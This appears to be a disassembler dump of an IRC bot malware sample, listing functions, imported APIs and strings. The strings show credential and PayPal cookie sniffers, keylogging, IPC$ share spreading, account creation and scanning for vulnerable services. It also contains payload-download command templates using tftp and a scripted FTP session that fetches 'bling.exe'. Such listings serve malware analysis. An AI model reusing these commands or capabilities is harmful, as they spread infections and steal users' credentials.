sub_outside():
KERNEL32.Sleep
KERNEL32.GetTickCount
KERNEL32.CreateThread
NTDLL.RtlGetLastWin32Error
KERNEL32.ExitProcess
KERNEL32.GetLocaleInfoA
KERNEL32.GetVersionExA
KERNEL32.CloseHandle
KERNEL32.CreateFileA
KERNEL32.ReadFile
WS2_32.inet_addr
WS2_32.select
WS2_32.socket
WS2_32.recv
KERNEL32.MultiByteToWideChar
WS2_32.WSAStartup
WS2_32.gethostbyname
KERNEL32.CreatePipe
WS2_32.setsockopt
WS2_32.ioctlsocket
WS2_32.bind
WS2_32.listen
WS2_32.__WSAFDIsSet
WS2_32.accept
WS2_32.send
WS2_32.closesocket
KERNEL32.GetFileAttributesA
KERNEL32.FindFirstFileA
KERNEL32.FindNextFileA
KERNEL32.TerminateThread
WS2_32.ntohs
WS2_32.inet_ntoa
KERNEL32.LoadLibraryA
KERNEL32.GetLocalTime
KERNEL32.GetVersion
KERNEL32.InterlockedIncrement
KERNEL32.InterlockedDecrement
KERNEL32.VirtualFree
NTDLL.RtlFreeHeap
KERNEL32.HeapDestroy
KERNEL32.TlsFree
KERNEL32.TlsGetValue
KERNEL32.TlsSetValue
NTDLL.RtlDeleteCriticalSection
KERNEL32.LCMapStringW
KERNEL32.WideCharToMultiByte
KERNEL32.GetStringTypeW
|
sub_402EAE(00c5):
KERNEL32.Sleep
"PASS %s\r\n"
|
sub_42B770(02ba):
KERNEL32.SetFilePointer
NTDLL.RtlGetLastWin32Error
|
sub_420D00(03ba):
KERNEL32.DebugBreak
|
sub_41A227(04c3):
KERNEL32.GetTickCount
|
sub_41FEE0(05b0):
KERNEL32.InterlockedIncrement
KERNEL32.InterlockedDecrement
|
sub_42E9D0(05b0):
KERNEL32.InterlockedIncrement
KERNEL32.InterlockedDecrement
|
sub_4134DE(078a):
"FTP sniff"
"#mss2"
"NICK "
"220 "
"230 "
"USER "
"PASS "
|
sub_41FF60(07ff):
KERNEL32.MultiByteToWideChar
NTDLL.RtlGetLastWin32Error
|
sub_4327B0(0822):
KERNEL32.GetVersionExA
|
sub_424520(08ae):
"filename != NULL"
"_open.c"
"mode != NULL"
"_open.c"
"_open.c"
|
sub_411875(0ab2):
KERNEL32.CreateThread
KERNEL32.Sleep
NTDLL.RtlGetLastWin32Error
|
sub_41F070(0ad9):
NTDLL.RtlEnterCriticalSection
|
sub_41F0E0(0ad9):
NTDLL.RtlLeaveCriticalSection
|
sub_418302(0b6c):
NTDLL.RtlGetLastWin32Error
"The following Windows services are regi"...
" Unknown"
" Paused"
" Pausing"
" Continuing"
" Running"
" Stoping"
" Starting"
" Stopped"
"%s: %s (%s)"
|
sub_413468(0d1f):
"IRC sniff"
"#mss2"
"OPER "
"NICK "
"oper "
"You are now an IRC Operator"
|
sub_41CFE0(0d6b):
"file != NULL"
"fopen.c"
"*file != _T('\\0')"
"fopen.c"
"mode != NULL"
"fopen.c"
"*mode != _T('\\0')"
"fopen.c"
|
sub_41132D(0d9c):
KERNEL32.CreateFileA
KERNEL32.SetFilePointer
KERNEL32.ReadFile
KERNEL32.CloseHandle
|
sub_4014F8(1017):
KERNEL32.GetModuleHandleA
NTDLL.RtlGetLastWin32Error
KERNEL32.LoadLibraryA
"kernel32.dll"
"SetErrorMode"
"CreateToolhelp32Snapshot"
"Process32First"
"GetDiskFreeSpaceExA"
"GetLogicalDriveStringsA"
"SearchPathA"
"QueryPerformanceCounter"
"QueryPerformanceFrequency"
"RegisterServiceProcess"
"user32.dll"
"SendMessageA"
"FindWindowA"
"IsWindow"
"GetClipboardData"
"CloseClipboard"
"GetAsyncKeyState"
"GetKeyState"
"GetWindowTextA"
"GetForegroundWindow"
"advapi32.dll"
"RegCreateKeyExA"
"RegSetValueExA"
"RegQueryValueExA"
"RegDeleteValueA"
"RegCloseKey"
"ClearEventLogA"
"OpenProcessToken"
"LookupPrivilegeValueA"
"AdjustTokenPrivileges"
"OpenSCManagerA"
"OpenServiceA"
"ControlService"
"CloseServiceHandle"
"EnumServicesStatusA"
"IsValidSecurityDescriptor"
"GetUserNameA"
"gdi32.dll"
"CreateDCA"
"CreateDIBSection"
"CreateCompatibleDC"
"GetDIBColorTable"
"SelectObject"
"BitBlt"
"DeleteDC"
"DeleteObject"
"ws2_32.dll"
"WSAStartup"
"WSASocketA"
"WSAAsyncSelect"
"__WSAFDIsSet"
"WSAIoctl"
"WSAGetLastError"
"WSACleanup"
"socket"
"ioctlsocket"
"connect"
"inet_ntoa"
"inet_addr"
"htons"
"htonl"
"ntohs"
"ntohl"
"send"
"sendto"
"recv"
"recvfrom"
"bind"
"select"
"listen"
"accept"
"setsockopt"
"getsockname"
"gethostname"
"getpeername"
"closesocket"
"wininet.dll"
"InternetGetConnectedState"
"InternetGetConnectedStateEx"
"HttpOpenRequestA"
"HttpSendRequestA"
"InternetConnectA"
"InternetOpenUrlA"
"InternetCrackUrlA"
"InternetReadFile"
"InternetCloseHandle"
"Mozilla/4.0 (compatible)"
"icmp.dll"
"IcmpCreateFile"
"IcmpCloseHandle"
"IcmpSendEcho"
"netapi32.dll"
"NetShareAdd"
"NetShareDel"
"NetShareEnum"
"NetScheduleJobAdd"
"NetApiBufferFree"
"NetRemoteTOD"
"NetUserAdd"
"NetUserDel"
"NetUserEnum"
"NetUserGetInfo"
"NetMessageBufferSend"
"NetWkstaGetInfo"
"dnsapi.dll"
"DnsFlushResolverCache"
"DnsFlushResolverCacheEntry_A"
"iphlpapi.dll"
"DeleteIpNetEntry"
"mpr.dll"
"WNetAddConnection2A"
"WNetAddConnection2W"
"WNetCancelConnection2A"
"WNetCancelConnection2W"
"shell32.dll"
"SHChangeNotify"
"odbc32.dll"
"SQLDriverConnect"
"SQLAllocHandle"
|
sub_42BEA0(1250):
KERNEL32.UnhandledExceptionFilter
|
sub_424CB0(1413):
"ch != _T('\\0')"
"output.c"
|
sub_416ABF(1416):
"%sKB"
"%sKB"
"%sKB"
"failed"
"failed"
"failed"
|
sub_42DC20(15f7):
NTDLL.RtlLeaveCriticalSection
|
sub_4219E0(16bb):
NTDLL.RtlDeleteCriticalSection
|
sub_40216A(1718):
"Kernel32.dll failed. <%d>"
"User32.dll failed. <%d>"
"Advapi32.dll failed. <%d>"
"Gdi32.dll failed. <%d>"
"Ws2_32.dll failed. <%d>"
"Wininet.dll failed. <%d>"
"Icmp.dll failed. <%d>"
"Netapi32.dll failed. <%d>"
"Dnsapi.dll failed. <%d>"
"Iphlpapi.dll failed. <%d>"
"Mpr32.dll failed. <%d>"
"Shell32.dll failed. <%d>"
"Odbc32.dll failed. <%d>"
|
sub_436680(1898):
KERNEL32.GetLocaleInfoW
KERNEL32.GetLocaleInfoA
KERNEL32.MultiByteToWideChar
|
sub_4116E4(1cb6):
KERNEL32.CreateThread
KERNEL32.Sleep
NTDLL.RtlGetLastWin32Error
|
sub_41BF70(1dec):
"memory check error at 0x%08X = 0x%02X, "...
|
sub_424A30(1ed9):
"_flsbuf.c"
"(\"inconsistent IOB fields\", stream->_pt"...
"_flsbuf.c"
|
sub_41C000(207f):
"_heapchk fails with _HEAPBADBEGIN.\n"
"%s"
"_heapchk fails with _HEAPBADNODE.\n"
"%s"
"_heapchk fails with _HEAPBADEND.\n"
"%s"
"_heapchk fails with _HEAPBADPTR.\n"
"%s"
"_heapchk fails with unknown return valu"...
"%s"
"DAMAGE: before %hs block (#%d) at 0x%08"...
"DAMAGE: after %hs block (#%d) at 0x%08X"...
"DAMAGE: on top of Free block at 0x%08X."...
"%hs allocated at file %hs(%d).\n"
"%hs located at 0x%08X is %u bytes long."...
|
sub_419602(21a7):
KERNEL32.CreatePipe
KERNEL32.GetCurrentProcess
KERNEL32.CloseHandle
KERNEL32.CreateThread
NTDLL.RtlGetLastWin32Error
"cmd.exe"
|
sub_426B40(2402):
"flag == 0 || flag == 1"
"_sftbuf.c"
|
sub_4219A0(2601):
KERNEL32.InitializeCriticalSection
|
sub_42B080(270a):
"setlocal.c"
|
sub_40C5EF(28a9):
"NETMANIAC"
"ADIK"
"*** MESSAGE ***"
"[*] Msg body size: %d\n"
|
sub_435310(293a):
"am/pm"
"a/p"
|
sub_425C30(2a82):
NTDLL.RtlGetLastWin32Error
KERNEL32.TlsGetValue
KERNEL32.TlsSetValue
NTDLL.RtlSetLastWin32Error
"tidtable.c"
|
sub_42DB90(2ae8):
KERNEL32.InitializeCriticalSection
NTDLL.RtlEnterCriticalSection
|
sub_42DC50(2c73):
NTDLL.RtlGetLastWin32Error
|
sub_41B330(2daa):
"_CrtCheckMemory()"
"dbgheap.c"
"Client hook re-allocation failure at fi"...
"Client hook re-allocation failure.\n"
"%s"
"Allocation too large or negative: %u by"...
"Error: memory allocation: bad memory bl"...
"%s"
"_CrtIsValidHeapPointer(pUserData)"
"dbgheap.c"
"pOldBlock->nLine == IGNORE_LINE && pOld"...
"dbgheap.c"
"_BLOCK_TYPE(pOldBlock->nBlockUse)==_BLO"...
"dbgheap.c"
"fRealloc || (!fRealloc && pNewBlock == "...
"dbgheap.c"
"_pLastBlock == pOldBlock"
"dbgheap.c"
"_pFirstBlock == pOldBlock"
"dbgheap.c"
|
sub_42C7E0(2ffe):
KERNEL32.GetEnvironmentStringsW
KERNEL32.GetEnvironmentStringsA
KERNEL32.WideCharToMultiByte
KERNEL32.FreeEnvironmentStringsW
|
sub_41E440(331e):
"fprintf.c"
"format != NULL"
"fprintf.c"
|
sub_425B50(3354):
KERNEL32.TlsAlloc
KERNEL32.TlsSetValue
"tidtable.c"
|
sub_418FDB(3687):
KERNEL32.CloseHandle
|
sub_40B8D0(36a1):
KERNEL32.Sleep
|
sub_42B220(3752):
"setlocal.c"
"="
";"
|
sub_42CB30(38f6):
""
"..."
"Runtime Error!\n\nProgram: "
"\n\n"
"Microsoft Visual C++ Runtime Library"
|
sub_40F19D(3b6b):
KERNEL32.CreateFileA
KERNEL32.CloseHandle
"fμΠ\a"
"\\\\%s"
"."
"\\\\%s\\ipc$"
"\\\\%s\\pipe\\wkssvc"
|
sub_42EC40(3fad):
"ungetc.c"
|
sub_418634(3fe3):
"Share name: Resource: "...
"Yes"
"No"
"%-14S %-24S %-6u %-4s"
|
sub_4269E0(4039):
"_sftbuf.c"
"_sftbuf.c"
|
sub_431120(4234):
"initnum.c"
"."
"initnum.c"
"initnum.c"
|
sub_421D10(429b):
NTDLL.RtlAllocateHeap
NTDLL.RtlReAllocateHeap
|
sub_412160(4448):
KERNEL32.CreatePipe
NTDLL.RtlGetLastWin32Error
KERNEL32.CloseHandle
|
sub_412332(4559):
KERNEL32.ReadFile
NTDLL.RtlGetLastWin32Error
|
sub_41C8A0(456d):
"Dumping objects ->\n"
"%s"
"#File Error#(%d) : "
"%hs(%d) : "
"{%ld} "
"client block at 0x%08X, subtype %x, %u "...
"normal block at 0x%08X, %u bytes long.\n"...
"crt block at 0x%08X, subtype %x, %u byt"...
"Object dump complete.\n"
"%s"
|
sub_408990(468e):
KERNEL32.GetTickCount
"mIRC"
"[M]"
"[%d]%s"
"mIRC"
"[M]"
|
sub_42EA50(4816):
KERNEL32.MultiByteToWideChar
"MB_CUR_MAX == 1 || MB_CUR_MAX == 2"
|
sub_4369D0(4caf):
KERNEL32.CompareStringW
KERNEL32.CompareStringA
KERNEL32.MultiByteToWideChar
"cchCount1==0 && cchCount2==1 || cchCoun"...
|
sub_4307A0(5012):
"inittime.c"
|
sub_41AF30(5171):
"_CrtCheckMemory()"
"dbgheap.c"
"Client hook allocation failure at file "...
"Client hook allocation failure.\n"
"%s"
"Invalid allocation size: %u bytes.\n"
"Error: memory allocation: bad memory bl"...
"%s"
|
sub_419367(526b):
KERNEL32.CloseHandle
|
sub_421BE0(52db):
NTDLL.RtlAllocateHeap
|
sub_436820(53c9):
KERNEL32.GetLocaleInfoW
KERNEL32.GetLocaleInfoA
KERNEL32.WideCharToMultiByte
|
sub_422E60(5f2d):
KERNEL32.VirtualAlloc
|
sub_418184(6353):
"The specified service name is invalid."
"The requested control code is undefined"...
"The handle is invalid."
"The handle does not have the required a"...
"The service binary file could not be fo"...
"The service cannot be stopped because o"...
"The database is locked."
"A thread could not be created for the s"...
"The process for the service was started"...
"The requested control code is not valid"...
"An instance of the service is already r"...
"The system is shutting down."
"An unknown error occurred: <%ld>"
|
sub_431450(642b):
"initmon.c"
|
sub_423E50(6774):
"_filbuf.c"
|
sub_410418(67c7):
"GET "
" "
" "
"GET "
"\r\n"
|
sub_416E07(68c3):
" "
" "
"PING"
"PONG %s\n"
"433"
"432"
"NICK %s\n"
|
sub_40DBFE(6aae):
"8a885d04-1ceb-11c9-9fe8-08002b104860"
|
sub_41EF20(6b94):
"_file.c"
"_file.c"
|
sub_40EC3D(6c1b):
KERNEL32.Sleep
""...
|
sub_415B2E(6cb9):
WS2_32.connect
WS2_32.ioctlsocket
WS2_32.__WSAFDIsSet
WS2_32.getsockopt
|
sub_419046(6e41):
KERNEL32.lstrcmpiA
KERNEL32.OpenProcess
KERNEL32.CloseHandle
"SeDebugPrivilege"
" %s (%d)"
" %s (%d)"
" %s (%d)"
"SeDebugPrivilege"
|
sub_40CDDB(6e81):
WS2_32.select
WS2_32.__WSAFDIsSet
|
sub_426810(6ed7):
KERNEL32.InterlockedIncrement
KERNEL32.InterlockedDecrement
|
sub_413061(6fd2):
KERNEL32.Sleep
"%s (Changed Windows: %s)"
"%s (Buffer full) (%s)"
"%s (Return) (%s)"
|
sub_42B670(7430):
"_"
"."
|
sub_4215E0(744e):
"_freebuf.c"
|
sub_4193BE(7918):
KERNEL32.CloseHandle
|
sub_413351(79f8):
"Bot sniff"
"#mss2"
"[PSNIFF]:"
"PSNIFF//"
"JOIN #"
"302 "
"366 "
":.login"
":!login"
":!Login"
":.Login"
":.ident"
":!ident"
":.hashin"
":!hashin"
|
sub_417120(7aa9):
"-|`_\\{[]}"
"-|`_\\{[]}"
"-|`_\\{[]}"
"-|`_\\{[]}"
|
sub_412F80(7bca):
KERNEL32.GetLocalTime
"[%d-%d-%d %d:%d:%d] %s\r\n"
|
sub_42B510(7d34):
"_.,"
|
sub_4179FA(7d4b):
"mIRC"
"mIRC"
|
sub_40871E(7e76):
KERNEL32.GetTickCount
|
sub_422D50(7fc5):
NTDLL.RtlReAllocateHeap
NTDLL.RtlAllocateHeap
KERNEL32.VirtualAlloc
NTDLL.RtlFreeHeap
|
sub_40A958(811e):
KERNEL32.MultiByteToWideChar
"\\\\"
|
sub_409F32(81df):
KERNEL32.GetTickCount
NTDLL.RtlEnterCriticalSection
NTDLL.RtlLeaveCriticalSection
KERNEL32.Sleep
"netbios"
|
sub_42DDC0(82a3):
NTDLL.RtlGetLastWin32Error
|
sub_421F70(865e):
KERNEL32.HeapValidate
NTDLL.RtlGetLastWin32Error
|
sub_419E6F(86cb):
KERNEL32.GetTickCount
"POST / HTTP/1.0\r\nHost: %s\r\nContent-Leng"...
"\r\n"
|
sub_421530(86d7):
KERNEL32.CloseHandle
NTDLL.RtlGetLastWin32Error
|
sub_41037E(86fd):
WS2_32.send
KERNEL32.Sleep
WS2_32.closesocket
WS2_32.WSACleanup
"rb"
|
sub_408FCD(8732):
"%s %s stopped. (%d thread(s) stopped.)"
"%s No %s thread found."
|
sub_40B7F9(87f2):
KERNEL32.Sleep
"echo open %s %d > o&echo user 1 1 >> o "...
"bling.exe\r\n"
|
sub_41F0B0(880a):
NTDLL.RtlEnterCriticalSection
|
sub_41F120(880a):
NTDLL.RtlLeaveCriticalSection
|
sub_41889B(893c):
"Account: %S"
"Full Name: %S"
"User Comment: %S"
"Comment: %S"
"Unknown"
"Administrator"
"User"
"Guest"
"Privilege Level: %s"
"Auth Flags: %d"
"Home Directory: %S"
"Parameters: %S"
"Password Age: %d"
"Bad Password Count: %d"
"Number of Logins: %d"
"Last Logon: %d"
"Last Logoff: %d"
"Logon Server: %S"
"Country Code: %d"
"User's Language: %d"
"Max. Storage: %d"
|
sub_41F890(8af0):
NTDLL.RtlUnwind
|
sub_432800(8c7e):
KERNEL32.GetLocaleInfoA
"040a"
"1252"
|
sub_4184FE(8cdb):
KERNEL32.WideCharToMultiByte
|
sub_416F00(8dd5):
"NICK %s\nUSER %s \"hotmail.com\" \"127.0.0."...
|
sub_4285A0(8e13):
NTDLL.RtlDeleteCriticalSection
|
sub_4179BF(8e50):
KERNEL32.GlobalLock
KERNEL32.GlobalUnlock
|
sub_41EB80(8f05):
"string != NULL"
"sscanf.c"
"format != NULL"
"sscanf.c"
|
sub_432CF0(8fd2):
NTDLL.RtlGetLastWin32Error
|
sub_40EE3A(8fd2):
WS2_32.ntohs
WS2_32.send
"\r\n |
sub_40AA3E(90cb):
KERNEL32.MultiByteToWideChar
KERNEL32.Sleep
"\\\\"
|
sub_40145D(9155):
KERNEL32.Sleep
"NOTICE"
"PRIVMSG"
"%s"
"%s %s :%s\r\n"
|
sub_421A80(92b5):
KERNEL32.InitializeCriticalSection
NTDLL.RtlEnterCriticalSection
"mlock.c"
|
sub_419E55(963b):
KERNEL32.GetTickCount
|
sub_410301(9713):
WS2_32.WSAStartup
WS2_32.socket
WS2_32.inet_addr
WS2_32.ntohs
WS2_32.connect
WS2_32.closesocket
WS2_32.WSACleanup
|
sub_411539(98d1):
" : USERID : UNIX : %s\r\n"
|
sub_418DE9(9bb4):
"Invalid parameter."
"Server name not found."
"This network request is not supported."
"Not enough memory."
"The name is invalid."
"Duplicate share name."
"Invalid for redirected resource."
"Device or directory does not exist."
"Level parameter is invalid."
"A general failure occurred in the netwo"...
"The operation is allowed only on the pr"...
"The user account already exists."
"The group already exists."
"The password is shorter than required ("...
"An unknown error occurred."
"The computer name is invalid."
"Share not found."
"The user name could not be found."
"Network connection not found."
|
sub_4349B0(9bcf):
KERNEL32.InterlockedIncrement
KERNEL32.InterlockedDecrement
|
sub_421B20(9bd1):
NTDLL.RtlLeaveCriticalSection
|
sub_417BA1(9dbe):
"SeShutdownPrivilege"
|
sub_40E201(9ddb):
KERNEL32.Sleep
|
sub_4360C0(a18e):
KERNEL32.WideCharToMultiByte
|
sub_41CB60(a1d1):
"%.2X "
" Data: <%s> %s\n"
|
sub_412259(a294):
KERNEL32.GetCurrentProcess
KERNEL32.CloseHandle
NTDLL.RtlGetLastWin32Error
"cmd /q"
|
sub_42B8A0(a29e):
"ftell.c"
|
sub_40CF79(a2f7):
WS2_32.send
|
sub_421C60(a50f):
NTDLL.RtlReAllocateHeap
|
sub_40A146(a68a):
NTDLL.RtlDeleteCriticalSection
KERNEL32.InitializeCriticalSectionAndSpinCount
KERNEL32.CreateThread
KERNEL32.Sleep
NTDLL.RtlGetLastWin32Error
|
sub_40132F(a6f6):
KERNEL32.Sleep
KERNEL32.CloseHandle
KERNEL32.ExitProcess
|
sub_418C69(a909):
"Username accounts for local system:"
" %S"
"Total users found: %d."
|
sub_4180E2(a9bc):
NTDLL.RtlGetLastWin32Error
|
sub_4211A0(acae):
"szUserMessage != NULL"
"dbgrpt.c"
""
"..."
"..."
"\n\nFor information on how your program c"...
"Expression: "
"\n\n"
"\nLine: "
"\nFile: "
"\nModule: "
"Debug %s!\n\nProgram: %s%s%s%s%s%s%s%s%s%"...
"_CrtDbgReport: String too long or IO Er"...
"Microsoft Visual C++ Debug Library"
|
sub_42D680(ad38):
KERNEL32.InitializeCriticalSection
NTDLL.RtlEnterCriticalSection
NTDLL.RtlLeaveCriticalSection
"osfinfo.c"
|
sub_4306B0(adf0):
KERNEL32.SetUnhandledExceptionFilter
|
sub_4185D0(afa1):
KERNEL32.MultiByteToWideChar
|
sub_41D260(afb7):
"string != NULL"
"sprintf.c"
"format != NULL"
"sprintf.c"
|
sub_416A2E(b2db):
"Cdrom"
"Network"
"Disk"
"Invalid"
"Unknown"
|
sub_4306D0(b3eb):
KERNEL32.SetUnhandledExceptionFilter
|
sub_41B920(b6b2):
"_CrtCheckMemory()"
"dbgheap.c"
"Client hook free failure.\n"
"%s"
"_CrtIsValidHeapPointer(pUserData)"
"dbgheap.c"
"_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)"
"dbgheap.c"
"DAMAGE: before %hs block (#%d) at 0x%08"...
"DAMAGE: after %hs block (#%d) at 0x%08X"...
"pHead->nLine == IGNORE_LINE && pHead->l"...
"dbgheap.c"
"pHead->nBlockUse == nBlockUse"
"dbgheap.c"
"_pLastBlock == pHead"
"dbgheap.c"
"_pFirstBlock == pHead"
"dbgheap.c"
|
sub_41D360(b784):
"string != NULL"
"sprintf.c"
"format != NULL"
"sprintf.c"
|
sub_41FCE0(b786):
"_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)"
|
sub_41BD30(b86e):
"_CrtCheckMemory()"
"dbgheap.c"
"_CrtIsValidHeapPointer(pUserData)"
"dbgheap.c"
"_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)"
"dbgheap.c"
"pHead->nBlockUse == nBlockUse"
"dbgheap.c"
|
sub_413565(b9cf):
"HTTP sniff"
"#mss2"
"paypal"
"PAYPAL"
"PAYPAL.COM"
"paypal.com"
"Set-Cookie:"
|
sub_40E268(baa6):
KERNEL32.MultiByteToWideChar
KERNEL32.WideCharToMultiByte
"\\\\%s"
"%s\\ipc$"
|
sub_4240D0(bae6):
KERNEL32.ReadFile
NTDLL.RtlGetLastWin32Error
|
sub_415725(bbd6):
WS2_32.inet_addr
KERNEL32.GetTickCount
"%d.%d.%d.%d"
|
sub_402D46(bc9b):
KERNEL32.Sleep
"[MAIN]: Connected to %s."
|
sub_409293(c3fd):
" Total: %d in %s."
|
sub_422000(c575):
KERNEL32.HeapCreate
KERNEL32.HeapDestroy
|
sub_41C600(c585):
"_CrtMemCheckPoint: NULL state pointer.\n"...
"%s"
"Bad memory block found at 0x%08X.\n"
|
sub_42E310(c701):
KERNEL32.CreateFileA
NTDLL.RtlGetLastWin32Error
KERNEL32.CloseHandle
|
sub_40D18E(c86d):
"GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
|
sub_408654(cb72):
KERNEL32.GetTickCount
"%s"
"%s%i"
|
sub_41C460(cbb3):
KERNEL32.HeapValidate
|
sub_437660(cc1e):
"invalid string position"
|
sub_415C17(cde1):
WS2_32.WSASocketA
KERNEL32.GetTickCount
KERNEL32.Sleep
" "
"%s%d "
|
start(cdf3):
"Windows Framework"
|
sub_42D5C0(ced4):
KERNEL32.LoadLibraryA
"user32.dll"
"MessageBoxA"
"GetActiveWindow"
"GetLastActivePopup"
|
sub_4135EC(cfb4):
"VULN sniff"
"#mss2"
"OpenSSL/0.9.6"
"Serv-U FTP Server"
"OpenSSH_2"
|
sub_429720(d27e):
"KERNEL32"
"IsProcessorFeaturePresent"
|
sub_41F520(d49f):
NTDLL.RtlUnwind
|
sub_4146B0(d826):
WS2_32.socket
WS2_32.ioctlsocket
WS2_32.connect
KERNEL32.Sleep
WS2_32.closesocket
|
sub_42E8B0(d8b8):
KERNEL32.InterlockedIncrement
KERNEL32.InterlockedDecrement
|
sub_417E0E(d9a3):
"tftp -i %s get %s &%s\r\n"
"echo open %s %d > o&echo user 1 1 >> o "...
|
sub_429A00(db6b):
"e+000"
|
sub_422120(db76):
NTDLL.RtlAllocateHeap
|
sub_410879(dd04):
"text/html"
"application/octet-stream"
"ddd, dd MMM yyyy"
"HH:mm:ss"
"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
|
sub_402617(e076):
"%d.%d.%d.%d"
|
sub_41DEE0(e108):
"string != NULL"
"fgets.c"
"fgets.c"
|
sub_420150(e16d):
KERNEL32.GetFileAttributesA
NTDLL.RtlGetLastWin32Error
|
sub_411418(e1a1):
"%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
|
sub_435830(e311):
NTDLL.RtlGetLastWin32Error
"inithelp.c"
"inithelp.c"
|
sub_428900(e6a3):
KERNEL32.RaiseException
|
sub_40A472(e730):
KERNEL32.CreateThread
KERNEL32.Sleep
KERNEL32.CloseHandle
|
sub_420CD0(e7c8):
KERNEL32.ExitProcess
|
sub_42E930(ea10):
KERNEL32.WideCharToMultiByte
|
sub_41801E(ec5e):
KERNEL32.GetTickCount
|
sub_437F60(ed95):
KERNEL32.RaiseException
|
sub_4161A7(edda):
KERNEL32.GetLocalTime
"[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
|
sub_420960(ef27):
KERNEL32.InterlockedIncrement
KERNEL32.InterlockedDecrement
|
sub_421F00(f07d):
NTDLL.RtlFreeHeap
|
sub_426BE0(f0ae):
"format != NULL"
"input.c"
"input.c"
|
sub_40CA75(f1cc):
"BBBB"
"CCCC"
|
sub_40F788(f386):
KERNEL32.ReadFile
|
sub_40DA10(f522):
KERNEL32.WideCharToMultiByte
|
sub_41D160(f534):
"string != NULL"
"vsprintf.c"
"format != NULL"
"vsprintf.c"
|
sub_416BE3(f5ac):
"failed"
|
sub_422240(f62a):
KERNEL32.VirtualFree
NTDLL.RtlFreeHeap
|
sub_4248B0(f9ac):
KERNEL32.InitializeCriticalSection
NTDLL.RtlEnterCriticalSection
"stream.c"
|
sub_414C00(fcb9):
KERNEL32.GetTickCount
|
sub_40AAF6(ff5a):
"FXNBFXFXNBFXFXFXFX"
"FXNBFXFXNBFXFXFXFX"
|